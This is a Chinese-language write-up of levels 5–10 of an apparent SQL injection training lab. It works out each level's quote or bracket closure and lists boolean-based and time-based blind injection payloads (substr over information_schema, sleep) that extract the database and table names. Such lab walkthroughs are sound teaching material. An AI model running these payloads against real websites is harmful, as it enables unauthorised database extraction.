第五关
没有查询信息,盲注,妥妥的
?id=1'报错
?id=1'-- -不报错:闭合方式为'
接下来就是一个字母一个字母试了
首先判断库名的长度:?id=1' and length(database())=8-- -正确输出,长度为8
接下来爆出库名为security
爆出库名爆表名:
?id=1'and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e'-- -
那么有人问了,这么多写错了怎么办
好问题,可以先在你的datagrip上编辑,如果可以运行再复制过来
例如这样:
接下来接着爆吧,不再演示。
第六关
换了个闭合方式:用”闭合,其余跟第五关一样
第七关
id=1'报错且id=1"不报错,那闭合方式肯定跟 ' 有关了(而且以'开头)
接着id=1'-- -报错,肯定不是单引号闭合,后面还有东西:
id=1')-- -还报错...懂了,加两个 括号:搞定
and 1=2试试,直接说sql错误,盲注
一样的套路
第八关
闭合方式为' 其余一样
第九关
上来有点懵,不管输入什么都是you are in ......
时间盲注试试
果然有反应
接下来的操作跟之前相差不大:
表名字段名一条龙(不如sqlmap)
?id=1'and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e' and sleep(2)-- -
第十题
依然是时间盲注:
闭合方式为"
这里查看闭合方式的方法为:
id=1' and sleep(2)-- -没有反应就换“ 再没有就接着换。
